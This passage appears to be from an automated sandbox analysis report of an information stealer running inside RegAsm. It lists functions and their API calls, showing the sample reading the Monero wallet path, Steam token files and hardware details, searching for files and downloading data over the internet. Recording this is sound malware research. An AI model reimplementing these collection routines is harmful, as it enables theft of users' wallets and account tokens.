                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                    • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                    • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                    • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                    Function 0040FE18 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3676486918-0
                                                                                    • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                                    • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                    • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                                    Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6%@$6%@
                                                                                    • API String ID: 0-3369382886
                                                                                    • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                    • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                    • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                    Function 00414538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041453D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265B3), ref: 0041458E
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                    • API String ID: 40794102-3507145866
                                                                                    • Opcode ID: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                    • Instruction ID: 67ec4c1d792d67a99180fbd14363f38a75f30ae372fc1f04672944380735093a
                                                                                    • Opcode Fuzzy Hash: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                    • Instruction Fuzzy Hash: D8214971C00188AACB14FBE5C956BDDBB78AF18308F50817EE401725D2DB78274CCA66
                                                                                    Function 004071C6 Relevance: 4.7, APIs: 3, Instructions: 231stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004071CB
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407402
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407416
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3193997572-0
                                                                                    • Opcode ID: cbc7415a79d248715024c5578be9318ededcedd343755c6c1e1074800eddd929
                                                                                    • Instruction ID: 8b519aabfee9ba70be02ce4985194bad941b289c0cb22c07f372139e5295b5b5
                                                                                    • Opcode Fuzzy Hash: cbc7415a79d248715024c5578be9318ededcedd343755c6c1e1074800eddd929
                                                                                    • Instruction Fuzzy Hash: 89A13C71904248EADB15EBE5D955BEDBBB4AF18308F5040BEE406735C2DB782B0CDB26
                                                                                    Function 004165D9 Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004165DE
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                    • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                      • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                      • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                      • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                    • String ID:
                                                                                    • API String ID: 25485560-0
                                                                                    • Opcode ID: 7b2ca0ca87c53fab111104ad7f9c0e0035106a6dff0b3672f02f9ca4e90a9d0e
                                                                                    • Instruction ID: a017e0cda9a087e3faea27a0b0bd6cecf8e4da27d40e214f5f1144f69bbc44a5
                                                                                    • Opcode Fuzzy Hash: 7b2ca0ca87c53fab111104ad7f9c0e0035106a6dff0b3672f02f9ca4e90a9d0e
                                                                                    • Instruction Fuzzy Hash: 7C41BE71D4022DABCF10ABB0DC13DED3B79AB0C304F00466AF844A2192E77997958B96
                                                                                    Function 6C6C3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C6C3095
                                                                                      • Part of subcall function 6C6C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C74F688,00001000), ref: 6C6C35D5
                                                                                      • Part of subcall function 6C6C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6C35E0
                                                                                      • Part of subcall function 6C6C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6C35FD
                                                                                      • Part of subcall function 6C6C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6C363F
                                                                                      • Part of subcall function 6C6C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6C369F
                                                                                      • Part of subcall function 6C6C35A0: __aulldiv.LIBCMT ref: 6C6C36E4
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6C309F
                                                                                      • Part of subcall function 6C6E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B85
                                                                                      • Part of subcall function 6C6E5B50: EnterCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5B90
                                                                                      • Part of subcall function 6C6E5B50: LeaveCriticalSection.KERNEL32(6C74F688,?,?,?,6C6E56EE,?,00000001), ref: 6C6E5BD8
                                                                                      • Part of subcall function 6C6E5B50: GetTickCount64.KERNEL32 ref: 6C6E5BE4
                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6C30BE
                                                                                      • Part of subcall function 6C6C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C6C3127
                                                                                      • Part of subcall function 6C6C30F0: __aulldiv.LIBCMT ref: 6C6C3140
                                                                                      • Part of subcall function 6C6FAB2A: __onexit.LIBCMT ref: 6C6FAB30
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                    • String ID:
                                                                                    • API String ID: 4291168024-0
                                                                                    • Opcode ID: eed07f006ddc9d7c6a3acb011cfcb79c37fa90e6d122bbdd161e6047a543cf0f
                                                                                    • Instruction ID: d9840a7a725a3dcf93fc1f473b10c0c415ebc47068d3d7624a24314bf999e2cf
                                                                                    • Opcode Fuzzy Hash: eed07f006ddc9d7c6a3acb011cfcb79c37fa90e6d122bbdd161e6047a543cf0f
                                                                                    • Instruction Fuzzy Hash: 0DF0D622E2074897CB10FF3498411E6B371EF6B218F50933BE85853521FB2061D8838F
                                                                                    Function 00411EB8 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411EBD
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                                      • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                                      • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                                      • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                                      • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                                      • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                                      • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                                      • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                                      • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                    • String ID: B
                                                                                    • API String ID: 1244342732-1255198513
                                                                                    • Opcode ID: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
                                                                                    • Instruction ID: 7cb4668c239315be8392dc4a7e389f554ac74aed044ceac891e831ccfcc386df
                                                                                    • Opcode Fuzzy Hash: 445673c05ee04e935469998d6e1ad7673640e60efa6b345dae39504cf7bb3895
                                                                                    • Instruction Fuzzy Hash: 64529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66
                                                                                    Function 0040B8AF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
